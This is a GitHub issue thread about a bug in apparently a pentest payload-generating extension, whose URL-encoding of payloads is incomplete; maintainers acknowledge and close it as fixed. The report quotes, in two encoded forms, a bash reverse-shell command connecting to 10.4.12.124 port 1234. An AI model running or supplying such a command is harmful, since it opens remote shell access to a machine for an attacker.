Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Encode URL Dont Work #130

Closed
ooclaar opened this issue Jan 14, 2023 · 2 comments
Closed

Encode URL Dont Work #130

ooclaar opened this issue Jan 14, 2023 · 2 comments
Assignees
Labels
bug Something isn't working

Comments

@ooclaar
Copy link

ooclaar commented Jan 14, 2023

Hi! First congratulations on the plugin. It's my favorite. Second, I wanted to report that the encode of a bash reverse shell is not working correctly. Encode always never works. See the result of what I copied:

bash%20-c%20'exec%20bash%20-i%20&%3E/dev/tcp/10.4.12.124/1234%20%3C&1'

Now look at the difference between another well known tool. I believe that some bars need to be replaced for it to work correctly.

bash%20-c%20%27exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F10.4.12.124%2F1234%20%3C%261%27

By: https://www.urlencoder.org/

Thanks.

@LasCC
Copy link
Owner

LasCC commented Jan 14, 2023

Thank you for bringing this issue to our attention. We apologize for the inconvenience this may have caused.

We will make sure to address this in the next release by replacing the necessary component to ensure that it works correctly.

Thank you for your feedback and for using our extension!

@LasCC LasCC self-assigned this Jan 14, 2023
@LasCC LasCC added the bug Something isn't working label Jan 14, 2023
@rb-x
Copy link
Collaborator

rb-x commented Jan 26, 2023

fixed in a71c62a

@rb-x rb-x closed this as completed Jan 26, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

3 participants